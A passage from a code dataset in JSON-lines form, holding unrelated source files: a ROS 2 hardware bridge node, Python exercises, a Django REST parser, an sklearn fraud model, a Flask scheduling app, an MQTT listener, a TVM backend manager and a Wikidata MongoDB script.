\"\"\"Implement TelemetrixCallback\"\"\"\n msg: AnalogReadingMsg = AnalogReadingMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.analog_pin = analog_pin\n msg.reference_voltage = reference_voltage\n msg.analog_value = analog_value\n\n self._analog_reading_pub.publish(msg)\n\n def on_cpu_fan_rpm(self, timestamp: datetime, digital_pin: int, rpm: int) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: CPUFanSpeedMsg = CPUFanSpeedMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.digital_pin = digital_pin\n msg.fan_speed_rpm = float(rpm)\n\n self._cpu_fan_speed_pub.publish(msg)\n\n def on_digital_reading(\n self, timestamp: datetime, digital_pin: int, digital_value: bool\n ) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: DigitalReadingMsg = DigitalReadingMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = RosTranslator.convert_timestamp(timestamp)\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.digital_pin = digital_pin\n msg.digital_value = (\n AVRConstantsMsg.HIGH if digital_value else AVRConstantsMsg.LOW\n )\n\n self._digital_reading_pub.publish(msg)\n\n def on_memory_data(\n self,\n total_ram: int,\n static_data_size: int,\n heap_size: int,\n stack_size: int,\n free_ram: int,\n free_heap: int,\n ) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: MCUMemoryMsg = MCUMemoryMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = self._get_timestamp()\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.total_ram = total_ram\n msg.static_data_size = static_data_size\n msg.heap_size = heap_size\n msg.stack_size = stack_size\n msg.free_ram = free_ram\n msg.free_heap = free_heap\n\n self._mcu_memory_pub.publish(msg)\n\n def on_string_data(self, data: str) -> None:\n \"\"\"Implement TelemetrixCallback\"\"\"\n msg: MCUStringMsg = MCUStringMsg()\n\n # Timestamp in ROS header\n header = HeaderMsg()\n header.stamp = self._get_timestamp()\n header.frame_id = \"\" # TODO\n\n msg.header = header\n msg.message = data\n\n self._mcu_string_pub.publish(msg)\n\n # Debug logging\n self.get_logger().info(data)\n\n def _handle_analog_read(\n self, request: AnalogReadSvc.Request, response: AnalogReadSvc.Response\n ) -> AnalogReadSvc.Response:\n \"\"\"Handle ROS 2 analog pin reads\"\"\"\n # Translate parameters\n analog_pin: int = request.analog_pin\n\n # Debug logging\n self.get_logger().info(f\"Reading value for analog pin {analog_pin}\")\n\n # Perform service\n result: Tuple[float, float, datetime] = self._bridge.analog_read(analog_pin)\n\n # Translate result\n response.stamp = RosTranslator.convert_timestamp(result[2])\n response.reference_voltage = float(result[1])\n response.analog_value = float(result[0])\n\n return response\n\n def _handle_cpu_fan_write(\n self, request: PWMWriteSvc.Request, response: PWMWriteSvc.Response\n ) -> PWMWriteSvc.Response:\n \"\"\"Handle ROS 2 CPU fan PWM writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n duty_cycle: float = request.duty_cycle\n\n # Debug logging\n self.get_logger().info(\n f\"Setting CPU fan on pin {digital_pin} to duty cycle {duty_cycle}\"\n )\n\n # Perform service\n self._bridge.cpu_fan_write(digital_pin, duty_cycle)\n\n return response\n\n def _handle_digital_read(\n self, request: DigitalReadSvc.Request, response: DigitalReadSvc.Response\n ) -> DigitalReadSvc.Response:\n \"\"\"Handle ROS 2 digital pin reads\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n\n # Debug logging\n self.get_logger().info(f\"Reading value for digital pin {digital_pin}\")\n\n # Perform service\n result: Tuple[bool, datetime] = self._bridge.digital_read(digital_pin)\n\n # Translate result\n response.stamp = RosTranslator.convert_timestamp(result[1])\n response.value = AVRConstantsMsg.HIGH if result[0] else AVRConstantsMsg.LOW\n\n return response\n\n def _handle_digital_write(\n self, request: DigitalWriteSvc.Request, response: DigitalWriteSvc.Response\n ) -> DigitalWriteSvc.Response:\n \"\"\"Handle ROS 2 digital pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n digital_value: bool = request.digital_value == AVRConstantsMsg.HIGH\n\n # Debug logging\n self.get_logger().info(\n f\"Setting digital pin {digital_pin} value to {'HIGH' if digital_value else 'LOW'}\"\n )\n\n # Perform service\n self._bridge.digital_write(digital_pin, digital_value)\n\n return response\n\n def _handle_pwm_write(\n self, request: PWMWriteSvc.Request, response: PWMWriteSvc.Response\n ) -> PWMWriteSvc.Response:\n \"\"\"Handle ROS 2 PWM pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n duty_cycle: float = request.duty_cycle\n\n # Debug logging\n self.get_logger().info(\n f\"Setting PWM on pin {digital_pin} to duty cycle {duty_cycle}\"\n )\n\n # Perform service\n self._bridge.pwm_write(digital_pin, duty_cycle)\n\n return response\n\n def _handle_report_mcu_memory(\n self, request: ReportMCUMemorySvc.Request, response: ReportMCUMemorySvc.Response\n ) -> ReportMCUMemorySvc.Response:\n \"\"\"Handle request to enable/disable MCU memory reporting\"\"\"\n # Translate parameters\n reporting_period_ms: int = request.reporting_period_ms\n\n # Debug logging\n if reporting_period_ms != 0:\n self.get_logger().info(f\"Reporting MCU memory at {reporting_period_ms}ms\")\n else:\n self.get_logger().info(\"Disabling MCU memory reporting\")\n\n # Perform service\n self._bridge.set_memory_reporting_interval(reporting_period_ms)\n\n return response\n\n def _handle_servo_write(\n self, request: ServoWriteSvc.Request, response: ServoWriteSvc.Response\n ) -> ServoWriteSvc.Response:\n \"\"\"Handle ROS 2 servo pin writes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n position: float = request.position\n\n # Debug logging\n self.get_logger().info(\n f\"Setting servo on pin {digital_pin} to position {position}\"\n )\n\n # Perform service\n self._bridge.servo_write(digital_pin, position)\n\n return response\n\n def _handle_set_analog_mode(\n self, request: SetAnalogModeSvc.Request, response: SetAnalogModeSvc.Response\n ) -> SetAnalogModeSvc.Response:\n \"\"\"Handle ROS 2 analog pin mode changes\"\"\"\n # Translate parameters\n analog_pin: int = request.analog_pin\n analog_mode: AnalogMode\n\n try:\n analog_mode = RosTranslator.analog_mode_to_telemetrix(request.analog_mode)\n except KeyError:\n self.get_logger().error(\n f\"Invalid analog mode ({request.analog_mode}), disabling pin\"\n )\n analog_mode = AnalogMode.DISABLED\n\n # Debug logging\n self.get_logger().info(f\"Setting analog pin {analog_pin} to mode {analog_mode}\")\n\n # Perform service\n self._bridge.set_analog_mode(analog_pin, analog_mode)\n\n return response\n\n def _handle_set_cpu_fan_sampling_interval(\n self,\n request: SetSamplingIntervalSvc.Request,\n response: SetSamplingIntervalSvc.Response,\n ) -> SetSamplingIntervalSvc.Response:\n \"\"\"Handle ROS 2 CPU fan sampling interval changes\"\"\"\n # Translate parameters\n sampling_interval_ms: int = request.sampling_interval_ms\n\n # Debug logging\n self.get_logger().info(\n f\"Setting CPU fan sampling interval to {sampling_interval_ms} ms\"\n )\n\n # Perform service\n self._bridge.set_cpu_fan_sampling_interval(sampling_interval_ms)\n\n return response\n\n def _handle_set_digital_mode(\n self, request: SetDigitalModeSvc.Request, response: SetDigitalModeSvc.Response\n ) -> SetDigitalModeSvc.Response:\n \"\"\"Handle ROS 2 digital pin mode changes\"\"\"\n # Translate parameters\n digital_pin: int = request.digital_pin\n digital_mode: DigitalMode\n\n try:\n digital_mode = RosTranslator.digital_mode_to_telemetrix(\n request.digital_mode\n )\n except KeyError:\n self.get_logger().error(\n f\"Invalid digital mode ({request.digital_mode}), disabling pin\"\n )\n digital_mode = DigitalMode.DISABLED\n\n # Debug logging\n self.get_logger().info(\n f\"Setting digital pin {digital_pin} to mode {digital_mode}\"\n )\n\n # Perform service\n self._bridge.set_digital_mode(digital_pin, digital_mode)\n\n return response\n\n def _handle_set_sampling_interval(\n self,\n request: SetSamplingIntervalSvc.Request,\n response: SetSamplingIntervalSvc.Response,\n ) -> SetSamplingIntervalSvc.Response:\n \"\"\"Handle ROS 2 sampling interval changes\"\"\"\n # Translate parameters\n sampling_interval_ms: int = request.sampling_interval_ms\n\n # Debug logging\n self.get_logger().info(\n f\"Setting sampling interval to {sampling_interval_ms} ms\"\n )\n\n # Perform service\n self._bridge.set_sampling_interval(sampling_interval_ms)\n\n return response\n\n def _get_timestamp(self) -> TimeMsg:\n return self.get_clock().now().to_msg()\n","repo_name":"eigendude/OASIS","sub_path":"oasis_drivers_py/oasis_drivers/nodes/telemetrix_bridge_node.py","file_name":"telemetrix_bridge_node.py","file_ext":"py","file_size_in_byte":18051,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"73686856168","text":"# Exercício Python 075: Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. No final,\n# mostre:\n\n# A) Quantas vezes apareceu o valor 9.\n# B) Em que posição foi digitado o primeiro valor 3.\n# C) Quais foram os números pares.\n\nnum = int(input('Digite o primeiro valor: '))\nnum2 = int(input('Digite o outro valor: '))\nnum3 = int(input('Digite o terceiro valor: '))\nnum4 = int(input('Digite o último valor: '))\ntupla = (num, num2, num3, num4)\nprint(f'Você digitou os valores {tupla}')\nif 9 in tupla:\n print(f'O número nove apareceu {tupla.count(9)} vezes')\nelse:\n print('O número nove não está na tupla')\nif 3 in tupla:\n print(f'O valor três apareceu na {tupla.index(3) + 1} posição')\nelse:\n print('O valor três não existe na tupla!')\n\nprint('Os valores pares digitados foram:', end=' ')\nfor x in tupla:\n if x % 2 == 0:\n print(x, end=', ')\n\n","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39509917009","text":"# parsers.py\nimport json\nfrom pathlib import Path\n\nimport jsonschema\nfrom jsonschema.exceptions import SchemaError\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.parsers import JSONParser\n\ndashboard_template_schema = json.loads((Path(__file__).parent / \"dashboard_template_schema.json\").read_text())\n\n\nclass DashboardTemplateCreationJSONSchemaParser(JSONParser):\n \"\"\"On DashboardTemplate creation, validate the JSON against a JSON schema.\n The template is sent in the \"template\" key\"\"\"\n\n def parse(self, stream, media_type=None, parser_context=None):\n data = super(DashboardTemplateCreationJSONSchemaParser, self).parse(\n stream, media_type or \"application/json\", parser_context\n )\n try:\n template = data[\"template\"]\n jsonschema.validate(template, dashboard_template_schema)\n except ValueError as error:\n raise ValidationError(detail=f\"Invalid JSON: {error}\")\n except SchemaError as error:\n raise ValidationError(detail=str(error))\n except jsonschema.exceptions.ValidationError as error:\n raise ValidationError(detail=str(error))\n else:\n return data\n","repo_name":"PostHog/posthog","sub_path":"posthog/api/dashboards/dashboard_template_json_schema_parser.py","file_name":"dashboard_template_json_schema_parser.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"4202572244","text":"import pandas as pd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler#, MinMaxScaler\nfrom transformer import Provider_Transformer\n\nclass Fraud_Detector(object):\n def __init__(self):\n pass\n def build_model(self):\n \"\"\"\n Building model pipeline \n \"\"\"\n steps = [#('preprocessor',preprocessor),\n ('rescale', StandardScaler()),\n #('rescale', MinMaxScaler()),\n ('clf', LogisticRegression(class_weight ='balanced',C=0.01,random_state=67, max_iter=10000))]\n self.pipeline = Pipeline(steps)\n def train(self):\n \"\"\"\n Train a model \n \"\"\"\n # load the data from csv to pandas dataframe\n # X_test_aggregated_raw = pd.read_csv(\"data/X_test_0817.csv\")\n X_train_aggregated_raw = pd.read_csv(\"data/X_train_0817.csv\")\n # y_test_aggregated_raw = pd.read_csv(\"data/y_test_0817.csv\")\n y_train_aggregated_raw = pd.read_csv(\"data/y_train_0817.csv\")\n\n # Define feature and target \n target = [\"Provider\", \"PotentialFraud\"]\n features = list(X_train_aggregated_raw.columns)\n self.features = [fea for fea in features if fea not in target]\n\n y_train=y_train_aggregated_raw['PotentialFraud']\n # y_test=y_test_aggregated_raw['PotentialFraud']\n X_train=X_train_aggregated_raw.drop('Provider',axis=1).fillna(0)\n # X_test=X_test_aggregated_raw.drop('Provider',axis=1).fillna(0)\n\n self.build_model()\n self.model = self.pipeline.fit(X_train, y_train)\n \n def predict(self, context):\n \"\"\"\n context: dictionary format {'TotalTEDiagCode':502,... etc}\n return np.array\n \"\"\"\n num_predictions = len([context[self.features[0]]])\n print(num_predictions)\n X = pd.DataFrame(context,index=range(num_predictions))\n return self.model.predict_proba(X)","repo_name":"wx0373/Medical-fraud","sub_path":"MedicalCareProviderFraud_app/app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24944266367","text":"from flask import Blueprint, render_template, request, url_for, g, flash\nfrom werkzeug.utils import redirect\n\nfrom main.models import EnableDay, ComeMenber, EnableDay_comment, User, Each_snack\nfrom main.forms import Day_Comment, SnackForm\nfrom .auth import login_required\nfrom main import db\n\nbp = Blueprint('date', __name__, url_prefix='/date')\n\n@bp.route('/')\ndef date():\n form = Day_Comment()\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n date = year + ',' + month + ',' + day\n # 오는사람 안오는사람 구분하기\n member = ComeMenber.query.filter_by(date=date).first()\n if not member:\n c_p_list, n_c_p_list = [''], ['']\n else:\n c_p_list, n_c_p_list = list((member.comeuser).split(',')), list((member.not_comeuser).split(','))\n # 그날의 내용 보여주기\n contents_list = EnableDay_comment.query.filter_by(date=date)\n name_list = []\n for i in contents_list:\n user = User.query.filter_by(id=i.id_user).first()\n name_list.append(user.username)\n # 그날 파인만 하는지 안하는지 알려주기\n e_d = EnableDay.query.filter_by(year=year, month=month, day = day).first()\n if e_d:\n enable_feynman = True\n else:\n enable_feynman = False\n return render_template('/day/date_detail.html', year = year, month = month, day = day, c_p_list = c_p_list, n_c_p_list = n_c_p_list,\n form = form, contents_list = contents_list, name = name_list, enable_feynman = enable_feynman)\n\n\n@bp.route(\"/EnableDay\")\n@login_required\ndef enableDay():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n e_d = EnableDay.query.filter_by(year=year, month=month, day = day).first()\n days = EnableDay(year=year, month=month, day = day)\n if e_d:\n db.session.delete(e_d)\n else:\n db.session.add(days)\n db.session.commit()\n return redirect(url_for('main.index'))\n\n\n@bp.route('/Record')\n@login_required\ndef record():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n come_notcome = request.args.get('come', \"T\", str)\n date = year + ',' + month + ',' + day\n come_people = ComeMenber.query.filter_by(date=date).first()\n if not come_people:\n # 데이터베이스에 날짜가 없을 때\n if come_notcome == 'T': \n today_people = ComeMenber(date = date, comeuser = ','+g.user.name, not_comeuser = \"\")\n else:\n today_people = ComeMenber(date = date, comeuser = \"\", not_comeuser = ','+g.user.name)\n db.session.add(today_people)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n else:\n # 데이터베이스에 날짜가 있을 때\n c_p_list, n_c_p_list = list((come_people.comeuser).split(',')), list((come_people.not_comeuser).split(','))\n\n #이름이 포함되있을 경우\n if g.user.name in c_p_list:\n #온다에 들어있을 때\n c_p_list.remove(g.user.name)\n elif g.user.name in n_c_p_list:\n #오지 않는다에 들어있을 때\n n_c_p_list.remove(g.user.name)\n \n #이름이 아무곳에도 포함 안되있을 경우\n if come_notcome == 'T': \n c_p_list.append(g.user.name)\n else:\n n_c_p_list.append(g.user.name)\n\n c_p_input, c_n_p_input = \",\".join(c_p_list), \",\".join(n_c_p_list)\n all_input = ComeMenber(date = date, comeuser = c_p_input, not_comeuser = c_n_p_input)\n db.session.delete(come_people)\n db.session.commit()\n db.session.add(all_input)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Comment///', methods = (\"GET\",\"POST\"))\n@login_required\ndef comment(year, month, day):\n date_list = [year, month, day]\n date_input = ','.join(date_list)\n form = Day_Comment()\n if request.method == 'POST' and form.validate_on_submit(): \n user = User.query.filter_by(username=g.user.username).first()\n text = EnableDay_comment(a_user = user, Title = form.Title.data , content = form.content.data, date = date_input)\n db.session.add(text)\n db.session.commit()\n elif (not form.Title.data) and (not form.content.data): \n flash(\"제목과 내용은 반드시 기입해야 합니다.\")\n elif not form.Title.data:\n flash(\"제목은 반드시 기입해야 합니다.\")\n elif not form.content.data:\n flash(\"내용은 반드시 기입해야 합니다.\")\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Snack', methods = (\"GET\",\"POST\"))\n@login_required\ndef snack():\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n date = year + ',' + month + ',' + day\n come_people = ComeMenber.query.filter_by(date=date).first()\n if come_people:\n if (come_people.comeuser != \"\"):\n come_people_name_list = list(come_people.comeuser.split(','))\n come_people_name_list.remove('')\n # 이름을 아이디로 바꾸기\n sub1 = []\n for name in come_people_name_list:\n each_user = User.query.filter_by(name=name).first()\n sub1.append(each_user.username)\n come_people_name_list = sub1\n #이름을 아이디로 ���꾸기 끝\n else:\n come_people_name_list = False\n else:\n come_people_name_list = False\n \n form = SnackForm()\n if request.method == 'POST' and form.validate_on_submit():\n user = User.query.filter_by(username=g.user.username).first()\n text = Each_snack(date = date, content = form.snack_content.data, a_user = user)\n db.session.add(text)\n db.session.commit()\n \n snack_all_data = Each_snack.query.filter_by(date=date)\n return render_template('/day/snack.html', come_people_name_list = come_people_name_list, form = form, snack_all_data = snack_all_data, \n year = year, month = month, day = day)\n\n\n@bp.route('/Delete_snack/', methods = (\"GET\",\"POST\"))\n@login_required\ndef delete_snack_function(snack_id):\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n delete_snack = Each_snack.query.filter_by(id=snack_id).first()\n db.session.delete(delete_snack)\n db.session.commit()\n return redirect( url_for('date.snack')+\"?dates=%s-%s-%s\" %(year, month, day) )\n\n\n@bp.route('/Delete_comment/', methods = (\"GET\",\"POST\"))\n@login_required\ndef delete_comment_function(comment_id):\n year, month, day = request.args.get('dates', \"2023-9-18\", str).split('-')\n delete_comment = EnableDay_comment.query.filter_by(id=comment_id).first()\n db.session.delete(delete_comment)\n db.session.commit()\n return redirect( url_for('date.date')+\"?dates=%s-%s-%s\" %(year, month, day) )","repo_name":"pizza119/site_handmade-feynman.kr","sub_path":"main/views/dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17441353444","text":"T = int(input())\ndef function(n,m):\n\tlen_n = len(n)\n\tskip = {val: (len_n - i - 1) for i, val in enumerate(n)}\n\tend = len_n - 1\n\tout = 0\n\twhile end <= len(m):\n\t\tif m[end] == n[-1]:\n\t\t\tfor i in range(end, (end - len_n + 1), -1):\n\t\t\t\tif m[i] == n[i - (end - len_n + 1)]:\n\t\t\t\t\tout += 1\n\t\t\t\telse:\n\t\t\t\t\tend = skip[i]\n\t\t\tif out == len_n:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\tout = 0\n\t\tend += len_n\n\t\tif end > len(m):\n\t\t\tend = len(m)\n\treturn 0\n\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\n# for test_case in range(1, T + 1):\n# \tn = input() # 패턴\n# \tm = input() # 문장\n# \tprint('#{} {}'.format(test_case, function(n,m)))\n\nfor test_case in range(1, T + 1):\n\tn = input() # 패턴\n\tm = input() # 문장\n\tif n in m:\n\t\tout= 1\n\telse:\n\t\tout=0 # 이거도 답임..\n\tprint('#{} {}'.format(test_case, out))\n\n","repo_name":"dodoyeon/SW_Academy","sub_path":"string/pattern.py","file_name":"pattern.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74280921447","text":"import os #operating system\nproducts = []\nif os.path.isfile('products.csv'):\n print('YES')\n#讀取資料\n with open('products.csv', 'r', encoding = 'utf-8') as f:\n for line in f:\n if '商品,價格' in line:\n continue #跳過\"繼續執行line\"\n name, price = line.strip().split(',')\n products.append([name, price])\n\n print(products)\nelse:\n print('NO')\n\n#讓使用者輸入商品名稱與價格\nwhile True:\n name = input('請輸入您的商品名稱:')\n if name == 'q':\n break\n price = input('請輸入您的商品價格:')\n price = int(price)\n p = []\n p.append(name)\n p.append(price) #簡化(7-9行)版 p = [name, price]\n products.append(p)#簡化(7-10行)版 products.append([name,price])\nprint(products)\n\n#印出商品名稱與價格\nfor product in products:\n #print(product)\n print(product[0],'的價格為', product[1])\n\n#寫入檔案\nwith open('products.csv','w',encoding = 'utf-8' ) as f:\n f.write('商品,價格\\n')\n for p in products:\n f.write(p[0] + ',' + str(p[1]) + '\\n')","repo_name":"yhchen0630/product","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5395971850","text":"from Questions.q0066PlusOne.BruteForce import plusOne\n\ndigits = [1,0,9,9,9]\nans = [1,1,0,0,0]\n\noutput = plusOne(digits)\n\nif ans == output:\n print(\"right\")\nelse:\n print(output)\n print(\"wrong\")","repo_name":"Lazy-yin/LeetCode-practice","sub_path":"Tests/test_q66.py","file_name":"test_q66.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17811760954","text":"import paho.mqtt.client as mqttc\n\nBUZZER_STATUS_TOPIC = 'UdeA/SmartGas/Buzzer/smargas_esp32_001/Status'\nBUZZER_BROKER_URL = '192.168.204.206'\nBUZZER_BROKER_PORT = 1883\n\n\nclass BuzzerListener:\n def __init__(self, observer):\n self.client = mqttc.Client()\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n self.observer = observer\n try:\n self.client.connect(BUZZER_BROKER_URL, BUZZER_BROKER_PORT, 60)\n except Exception as ex:\n print('SmartGas >> Failed broker connection. ex: {}'.format(ex))\n\n def on_connect(self, client, userdata, flags, rc):\n print('SmartGas >> Attempting MQTT connection to: ', BUZZER_STATUS_TOPIC)\n client.subscribe(topic=BUZZER_STATUS_TOPIC, qos=1)\n\n def on_message(self, client, userdata, msg):\n print('Message arrived: ', msg.payload.decode('utf-8'))\n self.observer.process_buzzer_status(msg.payload.decode('utf-8'))\n\n def start(self):\n print('SmartGas >> Looping')\n self.client.loop_forever()\n","repo_name":"victor013001/SmartGas-App","sub_path":"comm/BuzzerListener.py","file_name":"BuzzerListener.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920234841","text":"import logging\nimport os.path as osp\nfrom typing import Any, Optional, Sequence\n\nfrom ..base import BACKEND_MANAGERS, BaseBackendManager\n\n\n@BACKEND_MANAGERS.register('tvm')\nclass TVMManager(BaseBackendManager):\n\n @classmethod\n def build_wrapper(cls,\n backend_files: Sequence[str],\n device: str = 'cpu',\n input_names: Optional[Sequence[str]] = None,\n output_names: Optional[Sequence[str]] = None,\n deploy_cfg: Optional[Any] = None,\n **kwargs):\n \"\"\"Build the wrapper for the backend model.\n\n Args:\n backend_files (Sequence[str]): Backend files.\n device (str, optional): The device info. Defaults to 'cpu'.\n input_names (Optional[Sequence[str]], optional): input names.\n Defaults to None.\n output_names (Optional[Sequence[str]], optional): output names.\n Defaults to None.\n deploy_cfg (Optional[Any], optional): The deploy config. Defaults\n to None.\n \"\"\"\n from .wrapper import TVMWrapper\n bytecode = None if len(backend_files) <= 1 else backend_files[1]\n return TVMWrapper(\n backend_files[0],\n bytecode=bytecode,\n output_names=output_names,\n device=device)\n\n @classmethod\n def is_available(cls, with_custom_ops: bool = False) -> bool:\n \"\"\"Check whether backend is installed.\n\n Args:\n with_custom_ops (bool): check custom ops exists.\n Returns:\n bool: True if backend package is installed.\n \"\"\"\n import importlib\n ret = importlib.util.find_spec('tvm') is not None\n\n return ret\n\n @classmethod\n def get_version(cls) -> str:\n \"\"\"Get the version of the backend.\"\"\"\n if not cls.is_available():\n return 'None'\n else:\n import pkg_resources\n try:\n return pkg_resources.get_distribution('tvm').version\n except Exception:\n return 'None'\n\n @classmethod\n def to_backend(cls,\n ir_files: Sequence[str],\n work_dir: str,\n deploy_cfg: Any,\n log_level: int = logging.INFO,\n device: str = 'cpu',\n **kwargs) -> Sequence[str]:\n \"\"\"Convert intermediate representation to given backend.\n\n Args:\n ir_files (Sequence[str]): The intermediate representation files.\n work_dir (str): The work directory, backend files and logs should\n be saved in this directory.\n deploy_cfg (Any): The deploy config.\n log_level (int, optional): The log level. Defaults to logging.INFO.\n device (str, optional): The device type. Defaults to 'cpu'.\n Returns:\n Sequence[str]: Backend files.\n \"\"\"\n\n import copy\n\n from mmdeploy.apis.tvm import get_library_ext\n from mmdeploy.utils import (get_calib_filename, get_model_inputs,\n get_partition_config)\n from .onnx2tvm import from_onnx\n model_inputs = get_model_inputs(deploy_cfg)\n\n if device.startswith('cuda'):\n target = 'cuda'\n else:\n target = 'llvm'\n\n lib_ext = get_library_ext()\n\n tvm_files = []\n for model_id, onnx_path in enumerate(ir_files):\n model_input = copy.deepcopy(model_inputs[model_id])\n use_vm = model_input.get('use_vm', False)\n if 'target' not in model_input['tuner']:\n model_input['tuner']['target'] = target\n lib_path = osp.splitext(onnx_path)[0] + lib_ext\n code_path = osp.splitext(\n onnx_path)[0] + '.code' if use_vm else None\n model_input['output_file'] = lib_path\n model_input['onnx_model'] = onnx_path\n model_input['bytecode_file'] = code_path\n\n # create calibration dataset\n if 'qconfig' in model_input:\n from .quantize import HDF5Dataset\n calib_filename = get_calib_filename(deploy_cfg)\n calib_path = osp.join(work_dir, calib_filename)\n partition_cfgs = get_partition_config(deploy_cfg)\n onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]\n partition_type = 'end2end' if partition_cfgs is None \\\n else onnx_name\n dataset = HDF5Dataset(\n calib_path,\n model_input['shape'],\n model_type=partition_type,\n device=target)\n model_input['dataset'] = dataset()\n\n from_onnx(**model_input)\n\n tvm_files += [lib_path, code_path]\n\n return tvm_files\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/backend/tvm/backend_manager.py","file_name":"backend_manager.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"71743507688","text":"#!/usr/bin/env python3\n\nimport multiprocessing as mp\nfrom functools import partial\nfrom typing import Generator, List, Iterable, Tuple, Dict\n\nimport click\nfrom qwikidata.sparql import get_subclasses_of_item\nfrom pymongo import MongoClient\nfrom wikidata_helpers import WikidataMongoDB, WikidataRecord, chunks\nfrom bson.objectid import ObjectId\n\n\"\"\"\nAdds custom metadata to each Wikidata dump record at the top level.\nMainly useful as a preprocessing step for indexing.\n\nThe default information added is\n a) instance-of\n b) languages in which there exists a transliteration/alias\n\"\"\"\n\n\ndef grab_metadata_from_chunk(\n records: Iterable[WikidataRecord],\n) -> List[Tuple[str, Dict[str, List[str]]]]:\n return [\n (\n record.mongo_id,\n {\n \"instance_of\": list(record.instance_ofs),\n \"languages\": list(record.languages),\n },\n )\n for record in records\n ]\n\n\ndef parallel_upsert(\n chunk_plus_id_tuple, verbose, database_name, collection_name, chunk_size\n):\n chunk_id, chunk = chunk_plus_id_tuple\n wdb = WikidataMongoDB(database_name=database_name, collection_name=collection_name)\n if verbose:\n _from = chunk_id * chunk_size\n _to = (chunk_id + 1) * chunk_size - 1\n print(f\"Updating documents {_from} - {_to}...\")\n\n chunk = grab_metadata_from_chunk(chunk)\n for _id, doc in chunk:\n wdb.collection.update_one({\"_id\": ObjectId(_id)}, {\"$set\": doc}, upsert=True)\n\n\n@click.command()\n@click.option(\"--database-name\", \"-db\", default=\"wikidata_db\", help=\"Database name\")\n@click.option(\"--collection-name\", \"-c\", default=\"wikidata\", help=\"Collection name\")\n@click.option(\"--chunk-size\", \"-cz\", type=int, help=\"Chunk size\")\n@click.option(\"--n-processes\", \"-np\", type=int, default=8, help=\"Number of processes\")\n@click.option(\"--verbose\", is_flag=True)\ndef main(database_name, collection_name, chunk_size, n_processes, verbose,) -> None:\n \"\"\"Retrieves everything that is an instance of something from MongoDB,\n adds that information at the top level, and upserts the document\"\"\"\n\n outer_wdb = WikidataMongoDB(\n database_name=database_name, collection_name=collection_name\n )\n\n chunks_iterable = chunks(\n outer_wdb.find_matching_docs(as_record=True), chunk_size, should_enumerate=True\n )\n\n _parallel_upsert = partial(\n parallel_upsert,\n verbose=verbose,\n database_name=database_name,\n collection_name=collection_name,\n chunk_size=chunk_size,\n )\n\n with mp.Pool(processes=n_processes) as pool:\n pool.map(_parallel_upsert, chunks_iterable)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"j0ma/wikidata-munger","sub_path":"obsolete/insert_custom_metadata.py","file_name":"insert_custom_metadata.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36522470328","text":"import 